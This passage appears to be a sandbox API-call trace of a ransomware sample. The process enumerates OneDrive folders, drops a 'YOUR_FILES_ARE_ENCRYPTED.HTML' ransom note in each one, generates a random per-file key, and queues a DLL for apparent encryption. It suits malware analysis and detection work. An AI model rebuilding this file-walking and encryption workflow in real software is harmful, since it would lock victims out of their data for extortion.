dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="lb-lu", cAlternateFileName="")) returned 1 [0113.665] StrStrIW (lpFirst="lb-lu", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.665] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lb-lu") returned 81 [0113.665] GetProcessHeap () returned 0x600000 [0113.665] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.665] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lb-lu" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lb-lu") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lb-lu" [0113.665] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lb-lu", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lb-lu\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lb-lu\\*" [0113.665] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lb-lu\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe25f0e6c, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe25f0e6c, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe28ebb97, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0113.666] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe25f0e6c, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe25f0e6c, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe28ebb97, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="..", cAlternateFileName="")) returned 1 [0113.666] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe28ebb97, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe28ebb97, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe2c590be, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x174c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.666] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.666] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lb-lu\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.666] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.666] lstrlenW (lpString=".mui") returned 4 [0113.666] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.666] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe28ebb97, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe28ebb97, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe2c590be, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x174c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.666] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0113.666] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lb-lu\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.666] GetProcessHeap () returned 0x600000 [0113.666] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.666] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lb-lu\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\lb-lu\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.666] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.667] CloseHandle (hObject=0x334) returned 1 [0113.667] GetProcessHeap () returned 0x600000 [0113.667] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.667] GetProcessHeap () returned 0x600000 [0113.667] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.667] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a385d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1a385d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2245d34, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x1a8c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="LoggingPlatform.dll", cAlternateFileName="LOGGIN~1.DLL")) returned 1 [0113.668] StrStrIW (lpFirst="LoggingPlatform.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.668] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\LoggingPlatform.dll") returned 95 [0113.668] PathFindExtensionW (pszPath="LoggingPlatform.dll") returned=".dll" [0113.668] lstrlenW (lpString=".dll") returned 4 [0113.668] PathFindExtensionW (pszPath="LoggingPlatform.dll") returned=".dll" [0113.668] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.668] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\LoggingPlatform.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\loggingplatform.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0113.668] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=108736) returned 1 [0113.668] GetProcessHeap () returned 0x600000 [0113.668] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0113.670] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="6E") returned 2 [0113.670] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="54") returned 2 [0113.670] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="48") returned 2 [0113.670] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="53") returned 2 [0113.670] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="63") returned 2 [0113.670] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="E9") returned 2 [0113.670] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="F1") returned 2 [0113.670] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="63") returned 2 [0113.670] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="FD") returned 2 [0113.670] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="4F") returned 2 [0113.670] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="50") returned 2 [0113.670] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="30") returned 2 [0113.670] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="43") returned 2 [0113.670] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="5D") returned 2 [0113.670] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="B0") returned 2 [0113.670] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="ED") returned 2 [0113.670] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="1E") returned 2 [0113.670] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="97") returned 2 [0113.670] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="ED") returned 2 [0113.670] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="3A") returned 2 [0113.670] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="02") returned 2 [0113.670] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="6A") returned 2 [0113.670] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="6D") returned 2 [0113.670] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="D5") returned 2 [0113.670] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="B3") returned 2 [0113.670] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="58") returned 2 [0113.670] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="C2") returned 2 [0113.670] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="98") returned 2 [0113.670] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="33") returned 2 [0113.670] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="44") returned 2 [0113.670] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="23") returned 2 [0113.670] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="6C") returned 2 [0113.671] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\LoggingPlatform.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\LoggingPlatform.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\LoggingPlatform.dll" [0113.671] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.671] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0113.671] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2e05889, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe2e05889, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe2e05889, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="lt", cAlternateFileName="")) returned 1 [0113.671] StrStrIW (lpFirst="lt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.671] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lt") returned 78 [0113.671] GetProcessHeap () returned 0x600000 [0113.671] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x688490 [0113.672] lstrcpyW (in: lpString1=0x688490, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lt" [0113.672] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lt", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lt\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lt\\*" [0113.672] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lt\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2e05889, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe2e05889, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe597b70f, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0113.673] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2e05889, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe2e05889, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe597b70f, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName="..", cAlternateFileName="")) returned 1 [0113.673] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe597b70f, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe597b70f, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe663028c, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.673] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.673] wnsprintfW (in: pszDest=0x688490, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lt\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.673] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.673] lstrlenW (lpString=".mui") returned 4 [0113.673] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.673] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe597b70f, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe597b70f, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe663028c, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.673] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0113.673] wnsprintfW (in: pszDest=0x688490, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lt\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.673] GetProcessHeap () returned 0x600000 [0113.673] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.673] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lt\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\lt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0113.673] WriteFile (in: hFile=0x330, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.674] CloseHandle (hObject=0x330) returned 1 [0113.674] GetProcessHeap () returned 0x600000 [0113.674] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.674] GetProcessHeap () returned 0x600000 [0113.675] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x688490 | out: hHeap=0x600000) returned 1 [0113.675] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe67616a6, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe67616a6, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe67616a6, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="lv", cAlternateFileName="")) returned 1 [0113.675] StrStrIW (lpFirst="lv", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.675] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lv") returned 78 [0113.675] GetProcessHeap () returned 0x600000 [0113.675] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x688490 [0113.675] lstrcpyW (in: lpString1=0x688490, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lv" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lv") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lv" [0113.675] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lv", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lv\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lv\\*" [0113.675] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lv\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe67616a6, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe67616a6, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe6a82a2d, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0113.675] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe67616a6, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe67616a6, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe6a82a2d, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName="..", cAlternateFileName="")) returned 1 [0113.675] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6a82a2d, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe6a82a2d, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe702bf73, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.675] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.675] wnsprintfW (in: pszDest=0x688490, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lv\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.675] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.675] lstrlenW (lpString=".mui") returned 4 [0113.675] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.675] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6a82a2d, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe6a82a2d, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe702bf73, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.675] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0113.675] wnsprintfW (in: pszDest=0x688490, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lv\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.675] GetProcessHeap () returned 0x600000 [0113.675] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.675] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\lv\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\lv\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0113.676] WriteFile (in: hFile=0x330, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.677] CloseHandle (hObject=0x330) returned 1 [0113.677] GetProcessHeap () returned 0x600000 [0113.677] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.677] GetProcessHeap () returned 0x600000 [0113.677] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x688490 | out: hHeap=0x600000) returned 1 [0113.677] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe7458572, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe7458572, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe7458572, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="mi-nz", cAlternateFileName="")) returned 1 [0113.677] StrStrIW (lpFirst="mi-nz", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.677] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mi-nz") returned 81 [0113.677] GetProcessHeap () returned 0x600000 [0113.677] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x688490 [0113.677] lstrcpyW (in: lpString1=0x688490, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mi-nz" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mi-nz") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mi-nz" [0113.677] lstrcatW (in: 